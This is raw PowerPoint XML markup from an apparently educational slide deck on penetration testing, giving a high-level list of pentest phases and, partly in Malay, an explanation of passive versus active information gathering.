              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attempting to compromise systems by leveraging identified vulnerabilities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Extract data, maintain access, remove evidences</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Documentation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hardening and Post</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{652F1279-6CE4-4169-83D3-4483097B6907}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3671786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326E-A817-EFDE-752A-699B46BE2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5E0AB7-ED22-5520-717B-416A97E40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D9383-2823-7D49-D2BB-7508C2782C52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Define systems, applications, and data to be tested, gain permission and credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Collect info and identify vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use automated tools to identify open ports </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attempting to compromise systems by leveraging identified vulnerabilities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Extract data, maintain access, remove evidences</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Documentation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hardening and Post</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7EF8C3E-B085-3D7B-1FBB-1865F82440E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{652F1279-6CE4-4169-83D3-4483097B6907}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="317950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126747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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> information gathering </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>iaitu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Passive – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>interaksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> direct </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dgn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> system dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>menghantar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> apa2 request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Active – Method </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>boleh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dikesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> network traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Passive – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> apa2 public information </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>berkenaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Google Dork…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>Active – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>/tools </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" err="1"/>
              <a:t>yg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t> send requests </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t> system</a:t>
            </a:r>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10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1259164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04F5-92BF-440E-4C49-A693A92AE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3DBBC0-EAAD-35FE-41AD-A2FA3D4C6A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F24F55-E1A4-DC7A-01CF-C8EEFA129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C74CB0-25DE-B848-EA5F-48300258D8FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4FF16C75-9A64-426A-A259-3438E341D2DF}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/3/2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41DBC7AF-A105-05F5-8C73-038197F41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EDC364-8172-244D-364F-E8FD67802DCA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D98C6A6E-2FFE-418A-8459-05A51E13F748}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1107180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C56E-81BB-7C5C-0344-3748377D9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53BD12-2979-FC1A-1CFE-AD4F06FE25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34F8B6-AC49-20E0-944A-E3C0CFF90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215335-3DC5-1FBD-A3E3-FD2AF9BB6F52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4FF16C75-9A64-426A-A259-3438E341D2DF}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/3/2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A9AA3EF-613E-F922-CBA0-B6F2ED6C38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1A3918-C4CD-79BE-F4B2-F7988740795A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D98C6A6E-2FFE-418A-8459-05A51E13F748}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3920258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EAB5-B585-83D8-A194-81731E541F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8BDDF8-4D7C-B31F-B215-C9FF5E4633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A2AF0-CAB0-0DF4-AF23-B66C6A9500A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4FF16C75-9A64-426A-A259-3438E341D2DF}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/3/2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62F5EA22-04B8-8DE2-48C8-9E04D36AAE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8B983-B59E-9AD0-1FC5-28F29951C0AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D98C6A6E-2FFE-418A-8459-05A51E13F748}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1693968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1250E5-1AAA-C0A8-8BC7-1E5CC9D5AB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F4993E-BDF9-A6A9-188F-9613957AF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25DEA-E3E2-CB97-2D31-0BDC043A982B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4FF16C75-9A64-426A-A259-3438E341D2DF}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/3/2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{199270C6-1144-B73C-60E2-5BCCEF693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4DEF1-E27A-4F49-2E86-783F14934A64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D98C6A6E-2FFE-418A-8459-05A51E13F748}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1351216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B93A692-6FE4-459D-971B-4D9666573565}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="15" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3650190"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CE149D9E-74F2-422A-9403-DE25D7880EE3}"/>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B5A09A4-9D5C-43E2-B67D-0F7F764E33B2}"/>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63E81662-E3DD-4893-A0D0-8BE33B2D3F55}"/>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F949C55-7049-48E6-BF47-20C885196F95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5724052"/>
            <a:ext cx="7228116" cy="53005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2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B6E9378-3AE8-4175-BFF9-D4A80A07DBEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="738218" y="2580613"/>
            <a:ext cx="6123410" cy="3364399"/>
            <a:chOff x="-548507" y="477868"/>
            <a:chExt cx="11570449" cy="6357177"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Freeform: Shape 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0910F74B-EC52-4773-BC59-A95B4A2C6E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FF96CEC-5ECE-4416-AB10-FE34AE7BAF1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F755C6F-D202-4C89-B564-B246B06F1F6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2E5B49-F2D4-4500-B669-8FBE9BB5834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F77D40F1-5CB3-48EE-924E-6E3223E1022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9AFA37A4-144E-4F6B-A5A4-A8C4BBDC697A}"/>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BA89A6E2-E8EB-4AD0-85F6-B0A17B2422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8314224-AFA8-48BD-BEE7-13ED7B48495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E6139F3-8852-433B-9901-75B623701259}"/>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8EFA1CC8-0444-4599-AC49-BA67BBF07DD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768C533-0E1A-45D1-A3AF-081C6C4A09E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9F295247-3F7C-4048-9891-FA9EC6DCF74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Picture Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BB75F30-01AA-4ED9-8798-66B87A667AAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1560919" y="2771971"/>
            <a:ext cx="4535081" cy="2723593"/>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17" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3616A90-E1DE-47A7-83AE-E8FD3279FFF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45B078-9C2E-4F0F-A743-1BD2E374A3F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3254185"/>
            <a:ext cx="12192000" cy="1296144"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{346031F5-1B63-4620-8505-DE5C4A40B24C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="741800" y="1570966"/>
            <a:ext cx="2520000" cy="4680000"/>
            <a:chOff x="445712" y="1449040"/>
            <a:chExt cx="2520000" cy="4680000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Rounded Rectangle 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC27CB74-33CD-4A23-B325-C122DA66528C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="445712" y="1449040"/>
              <a:ext cx="2520000" cy="468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5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58D7BEA8-16EF-49F6-A423-7760EDAB82F5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1597700" y="1680321"/>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1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADA26798-7DB1-4A1B-8875-4A1F787E724F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1549420" y="5712364"/>
              <a:ext cx="312583" cy="312583"/>
              <a:chOff x="1570727" y="5532687"/>
              <a:chExt cx="312583" cy="312583"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="Oval 4">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F0E6646-AD22-4810-B8E0-6B3AA6FA86A2}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1570727" y="5532687"/>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7">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84E7817A-50E1-44BF-B5F3-B2BEF3E94706}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1655532" y="5616970"/>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9" name="Picture Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD8E3FD2-2332-4C3D-A627-541B7AFCAC9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="921680" y="1930403"/>
            <a:ext cx="2160240" cy="3744416"/>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dirty="0"/>
              <a:t>Place Your Picture Here</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88439E42-0E0F-4CED-B659-F8D68A350182}"/>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0C2BD9-6214-4567-96BE-E813DFC881B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="14" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3779656" y="1838324"/>
            <a:ext cx="8412345" cy="4067177"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>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1340647 w 8412345"/>
              <a:gd name="connsiteY8" fmla="*/ 3752847 h 4067177"/>
              <a:gd name="connsiteX9" fmla="*/ 2028961 w 8412345"/>
              <a:gd name="connsiteY9" fmla="*/ 3752847 h 4067177"/>
              <a:gd name="connsiteX10" fmla="*/ 2028961 w 8412345"/>
              <a:gd name="connsiteY10" fmla="*/ 3524256 h 4067177"/>
              <a:gd name="connsiteX11" fmla="*/ 1258986 w 8412345"/>
              <a:gd name="connsiteY11" fmla="*/ 3524256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2028961 w 8412345"/>
              <a:gd name="connsiteY10" fmla="*/ 3752847 h 4067177"/>
              <a:gd name="connsiteX11" fmla="*/ 1258986 w 8412345"/>
              <a:gd name="connsiteY11" fmla="*/ 3524256 h 4067177"/>
              <a:gd name="connsiteX12" fmla="*/ 0 w 8412345"/>
              <a:gd name="connsiteY12"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1258986 w 8412345"/>
              <a:gd name="connsiteY10" fmla="*/ 3524256 h 4067177"/>
              <a:gd name="connsiteX11" fmla="*/ 0 w 8412345"/>
              <a:gd name="connsiteY11"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258986 w 8412345"/>
              <a:gd name="connsiteY9" fmla="*/ 3524256 h 4067177"/>
              <a:gd name="connsiteX10" fmla="*/ 0 w 8412345"/>
              <a:gd name="connsiteY10"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0 w 8412345"/>
